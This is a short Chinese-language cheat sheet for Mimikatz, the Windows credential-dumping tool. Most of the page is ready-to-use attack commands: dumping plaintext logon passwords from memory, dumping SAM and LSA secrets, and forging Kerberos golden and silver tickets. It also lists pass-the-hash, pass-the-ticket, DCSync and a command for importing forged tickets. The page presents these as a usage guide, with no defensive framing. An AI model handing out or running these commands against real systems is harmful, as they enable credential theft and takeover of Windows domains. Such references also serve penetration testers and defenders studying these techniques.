Mimikatz

Mimikatz

Mimikatz 是一款 Windows 凭证提取工具,可以提取明文密码、哈希、PIN 码和 Kerberos 票据。

基础使用

提取明文密码

mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

提取 NTLM 哈希

mimikatz # lsadump::sam
mimikatz # lsadump::security

黄金票据

mimikatz # kerberos::golden /user:admin /domain:target.com /krbtgt:HASH /id:500

白银票据

mimikatz # kerberos::golden /domain:target.com /sid:S-1-5-21 /rc4:HASH /service:cifs /user:admin

功能特性

  • 凭证提取 - 提取明文密码和哈希
  • Kerberos 攻击 - 黄金/白银票据
  • 哈希传递 - Pass-the-Hash
  • 票据传递 - Pass-the-Ticket
  • DCSync - 模拟 DC 同步

常用命令

命令 描述
sekurlsa::logonpasswords 提取登录凭证
lsadump::sam 转储 SAM 数据库
kerberos::golden 创建黄金票据
kerberos::ptt 导入票据
misc::cmd 启动系统命令

参考资源